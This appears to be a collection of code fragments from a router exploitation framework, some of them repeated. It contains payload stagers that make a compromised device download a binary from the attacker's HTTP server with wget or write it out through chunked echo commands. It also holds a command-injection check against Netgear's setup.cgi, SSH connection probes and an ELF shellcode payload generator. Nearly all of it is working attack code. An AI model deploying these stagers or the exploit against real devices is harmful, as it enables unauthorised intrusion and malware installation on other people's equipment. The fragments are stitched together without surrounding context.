def wget(self): print_status("Using wget method") self.binary_name = random_text(8) if "binary" in self.wget_options.keys(): binary = self.wget_options['binary'] else: binary = "wget" # run http server self.mutex = True thread = threading.Thread(target=self.http_server, args=(self.options["lhost"], self.options["lport"])) thread.start() while self.mutex: pass if self.port_used: print_error("Could not set up HTTP Server on {}:{}".format( self.options["lhost"], self.options["lport"])) return False # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -O {}/{}".format( binary, self.options["lhost"], self.options["lport"], self.binary_name, self.location, self.binary_name) self.exploit.execute(cmd) return True
def run(self): result = {} rand_str = random_text(10) cmd = 'echo {}'.format(rand_str) path = '/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd={}&curpath=/¤tsetting.htm=1'.format(cmd) response = self.http_request( method="GET", path=path ) if response and rand_str in response.text: result['ExploitInfo'] = {} result['ExploitInfo']['URL'] = '{}:{}{}'.format(self.target, self.port, path) return result
def echo(self): print_status("Using echo method") self.binary_name = random_text(8) path = "{}/{}".format(self.location, self.binary_name) # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): echo_stream = self.echo_options["stream"] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): echo_prefix = self.echo_options["prefix"] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): echo_max_length = int(self.echo_options["max_length"]) else: echo_max_length = 30 size = len(self.payload) num_parts = int(size / echo_max_length) + 1 # transfer binary through echo command print_status("Sending payload to {}".format(path)) for i in range(0, num_parts): current = i * echo_max_length print_status("Transferring {}/{} bytes".format( current, len(self.payload))) block = str( binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8") block = echo_prefix + echo_prefix.join( a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd)
def wget(self): print_status("Using wget method") self.binary_name = random_text(8) if "binary" in self.wget_options.keys(): binary = self.wget_options['binary'] else: binary = "wget" # run http server all_interfaces = "0.0.0.0" try: server = HttpServer((all_interfaces, int(self.options["lport"])), HttpRequestHandler) except socket.error: print_error("Could not set up HTTP Server on {}:{}".format(self.options["lhost"], self.options["lport"])) return False thread = threading.Thread(target=server.serve_forever, args=(self.payload,)) thread.start() # wget binary print_status("Using wget to download binary") cmd = "{} http://{}:{}/{} -qO {}/{}".format(binary, self.options["lhost"], self.options["lport"], self.binary_name, self.location, self.binary_name) self.exploit.execute(cmd) thread.join(10) if thread.is_alive(): assassin = threading.Thread(target=server.shutdown) assassin.daemon = True assassin.start() return False return True
def echo(self): print_status("Using echo method") self.binary_name = random_text(8) path = "{}/{}".format(self.location, self.binary_name) # echo stream e.g. echo -ne {} >> {} if "stream" in self.echo_options.keys(): echo_stream = self.echo_options["stream"] else: echo_stream = 'echo -ne "{}" >> {}' # echo prefix e.g. "\\x" if "prefix" in self.echo_options.keys(): echo_prefix = self.echo_options["prefix"] else: echo_prefix = "\\x" # echo max length of the block if "max_length" in self.echo_options.keys(): echo_max_length = int(self.echo_options["max_length"]) else: echo_max_length = 30 size = len(self.payload) num_parts = int(size / echo_max_length) + 1 # transfer binary through echo command print_status("Sending payload to {}".format(path)) for i in range(0, num_parts): current = i * echo_max_length print_status("Transferring {}/{} bytes".format(current, len(self.payload))) block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8") block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2])) cmd = echo_stream.format(block, path) self.exploit.execute(cmd)
def test_connect(self) -> bool: """ Test connection to SSH server :return bool: True if test connection was successful, False otherwise """ try: self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False) except paramiko.AuthenticationException: self.ssh_client.close() return True except Exception as err: print_error(self.peer, "SSH Error while testing connection", err, verbose=self.verbosity) self.ssh_client.close() return False
def ssh_test_connect(self): ssh_client = self.ssh_create() try: ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False) except paramiko.AuthenticationException: ssh_client.close() return True except socket.error: print_error("Connection error") ssh_client.close() return False except Exception as err: print_error("Err: {}".format(err)) ssh_client.close() return False
class ArchitectureSpecificPayload(BasePayload): architecture = None output = OptString('python', 'Output type: elf/c/python') filepath = OptString( "/tmp/{}".format(random_text(8)), 'Output file to write' ) def __init__(self): super(ArchitectureSpecificPayload, self).__init__() if self.architecture not in Architectures: raise OptionValidationError( "Please use one of valid payload architectures: {}".format( Architectures._fields ) ) self.header = ARCH_ELF_HEADERS[self.architecture] self.bigendian = True if self.architecture.endswith("be") else False def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, 'wb+') as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError( "No such option as {}".format(self.output) ) def generate_elf(self, data): elf = self.header + data if elf[4] == 1: # ELFCLASS32 - 32 bit if self.bigendian: p_filesz = pack(">L", len(elf)) p_memsz = pack(">L", len(elf) + len(data)) else: p_filesz = pack("<L", len(elf)) p_memsz = pack("<L", len(elf) + len(data)) content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:] elif elf[4] == 2: # ELFCLASS64 - 64 bit if self.bigendian: p_filesz = pack(">Q", len(elf)) p_memsz = pack(">Q", len(elf) + len(data)) else: p_filesz = pack("<Q", len(elf)) p_memsz = pack("<Q", len(elf) + len(data)) content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:] return content @staticmethod def generate_c(data): res = "unsigned char sh[] = {\n \"" for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" res += "\\x%02x" % x res += "\"\n};" return res @staticmethod def generate_python(data): res = "payload = (\n \"" for idx, x in enumerate(data): if idx % 15 == 0 and idx != 0: res += "\"\n \"" res += "\\x%02x" % x res += "\"\n)" return res
def ssh_test_connect(self): ssh_client = self.ssh_create() try: ssh_client.connect(self.target, self.port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False) except paramiko.AuthenticationException: ssh_client.close() return True except socket.error: print_error("Connection error", verbose=self.verbosity) ssh_client.close() return False except Exception as err: print_error("Err: {}".format(err), verbose=self.verbosity) ssh_client.close() return False
def test_connect(self) -> bool: """ Test connection to SSH server :return bool: True if test connection was successful, False otherwise """ try: self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, username="******", password=random_text(12), look_for_keys=False) except paramiko.AuthenticationException: self.ssh_client.close() return True except Exception as err: print_error(self.peer, "SSH Error while testing connection", err, verbose=self.verbosity) self.ssh_client.close() return False